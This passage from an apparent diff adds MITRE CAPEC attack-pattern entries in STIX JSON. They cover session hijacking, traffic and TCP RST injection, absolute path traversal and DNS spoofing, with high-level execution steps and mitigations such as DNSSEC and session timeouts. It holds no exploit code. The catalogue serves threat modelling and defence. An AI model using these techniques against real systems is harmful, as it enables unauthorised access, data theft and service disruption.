"cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Browser Session Hijacking", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Use Alternate Authentication Material:Application Access Token", + "external_id": "T1550.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/001" + }, + { + "description": "Remote Service Session Hijacking", + "external_id": "T1563", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1563" + }, + { + "description": "Session hijacking attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_hijacking_attack" + }, + { + "description": "OWASP Web Security Testing Guide, The Open 
Web Application Security Project (OWASP)", + "external_id": "REF-603", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.html" + } + ], + "id": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Session Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Availability": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Integrity": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discover Existing Session Token: Through varrying means, an adversary will discover and store an existing session token for some other authenticated user session.

Experiment

  1. Insert Found Session Token: The attacker attempts to insert a found session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14" + ], + "x_capec_prerequisites": [ + "An application that leverages sessions to perform authentication." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to communicate with the application over the network." + ], + "x_capec_skills_required": { + "Low": "Exploiting a poorly protected identity token is a well understood attack with many helpful resources available." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. 
If the user logs back in then a new session key should be generated.", + "id": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-593-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b99d4053-f452-4a85-b020-ad0868cb52cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "spec_version": "2.1", + "target_ref": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. 
Instead, the adversary is crafting a specific input to affect the system in a particular way.", + "external_references": [ + { + "external_id": "CAPEC-594", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/594.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Traffic Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service.)" + ], + "Integrity": [ + "Other (An adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. 
The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", + "external_references": [ + { + "external_id": "CAPEC-595", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/595.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Connection Reset", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64" + ], + "x_capec_prerequisites": [ + "This attack requires the ability to monitor the target's network connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. 
The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-596", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/596.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP RST Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "An On/In Path Device" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. 
The goal of the adversary is to access directories and files that are intended to be restricted from their access.", + "external_references": [ + { + "external_id": "CAPEC-597", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/597.html" + }, + { + "external_id": "CWE-36", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/36.html" + } + ], + "id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Absolute Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. 
For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

  4. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.

  2. Techniques
    Access common files in root directories such as \"/bin\", \"/boot\", \"/lib\", or \"/home\"
    Access a specific drive letter or windows volume letter by specifying \"C:dirname\" for example
    Access a known Windows UNC share by specifying \"\\\\UNC\\share\\name\" for example

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

  2. Techniques
    Manipulate file and its path by injecting absolute path sequences (e.g. \"/home/file.txt\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_prerequisites": [ + "The target must leverage and access an underlying file system." + ], + "x_capec_resources_required": [ + "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks.", + "Medium": "Programming attacks." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd5a0b68-7c46-4210-afeb-a383890ba931", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3a5fb6c7-5605-48a4-b2ca-bcfff3e93226", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ea68faae-9ff5-4a52-a520-135a612e4458", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70fb8b30-3f7c-41ef-a691-34c163c6e04b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa408ca1-01a2-404d-a24a-90d14b0fcdbe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce2dd07c-e915-4e7b-90b5-8af1442e1aae", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d22787d-6e79-4bd5-8fb5-a6b95e74fc40", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--571be573-775a-4c2e-b74d-01d1a1a56a8a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. 
Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach.", + "id": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-597-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4be0c7a-12b3-47bb-9012-e6800e680e58", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a target's route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the target's DNS requests. 
This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the target's infrastructure uses.", + "external_references": [ + { + "external_id": "CAPEC-598", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/598.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Anonymous, Towards a Comprehensive Picture of the Great Firewall's DNS Censorship, 2014, USENIX", + "external_id": "REF-479", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record ) response before a legitimate resolver can.", + "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." 
+ ], + "x_capec_prerequisites": [ + "On/In Path Device" + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Avoid dependence on DNS", + "id": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae2e6105-d7fc-4e98-9dea-4493606440c6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fbf3499-e8c7-452e-87c7-9bd2e4733100", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a .onion domain with Tor support", + "id": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f5c44bc-4c83-4819-add3-4fc2f11b2fde", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNSSEC", + "id": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"id": "relationship--6c28461d-523b-453f-99b1-a60849c2db18", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNS-hold-open", + "id": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13141463-336a-4b22-955f-de061f868998", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target's consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. 
